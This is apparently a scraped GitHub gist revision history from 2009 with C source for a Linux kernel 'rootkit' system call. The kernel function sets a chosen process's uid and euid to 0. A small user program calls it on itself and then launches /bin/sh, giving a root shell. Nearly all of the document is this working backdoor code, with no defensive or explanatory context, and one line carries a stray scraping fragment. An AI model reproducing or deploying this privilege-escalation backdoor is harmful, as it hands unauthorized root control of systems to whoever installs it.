Created
August 6, 2009 11:38
Revisions
-
tariqadel revised this gist
Aug 6, 2009 . 1 changed file with 2 additions and 2 deletions.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -5,8 +5,8 @@ #define rootkit(x,y) syscall(__NR_rootkit,x,y) main() { printf("Exit code = %d\n\n",rootkit(1,getpid())); char *cmd[2]; cmd[0] = "/bin/sh"; cmd[1] = NULL; execve(cmd[0], cmd, NULL); -
Aug 6, 2009 . 1 changed file with 37 additions and 0 deletions.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,37 @@ #include "rootkit.h" int pc = 0; int print_info(void) { int o_ruid = current->uid; int o_euid = current->euid; int o_suid = current->suid; pc++;// inc counter printk("\n *** ---[ Printing %d ] *** \n", pc); printk("uid = %d ", o_ruid); printk("euid = %d ", o_euid); printk("suid = %d ", o_suid); printk("getuid() = %d ", (int) sys_getuid()); printk("geteuid() = %d ", (int) sys_geteuid()); printk("getpid() = %d ", (int) sys_getpid()); return (0); } asmlinkage int sys_rootkit(int mode, pid_t mypid) { struct task_struct *ts; int rc=0; // Get some feedback print_info(); printk("find_task_by_pid(%d)!\n", mypid); ts = find_task_by_pid(mypid); if(ts) { ts->uid = (uid_t)0; ts->euid = (uid_t)0; } else { rc = -1; } print_info(); return(rc); } -
Aug 6, 2009 . 2 changed files with 13 additions and 0 deletions.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,13 @@ #include <linux/unistd.h> #include <sys/syscall.h> #include <stdio.h> #define rootkit(x,y) syscall(__NR_rootkit,x,y) main() { {FNAMEL}.html">printf("Exit code = %d\n\n",rootkit(1,getpid())); char *cmd[2]; cmd[0] = "/bin/sh"; cmd[1] = NULL; execve(cmd[0], cmd, NULL); } Empty file. -
Aug 6, 2009 .There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,10 @@ #ifndef __LINUX_ROOTKIT_H #define __LINUX_ROOTKIT_H #include <linux/linkage.h> #include <linux/kernel.h> #include <linux/sched.h> #include <linux/syscalls.h> #include <linux/sys.h> #endif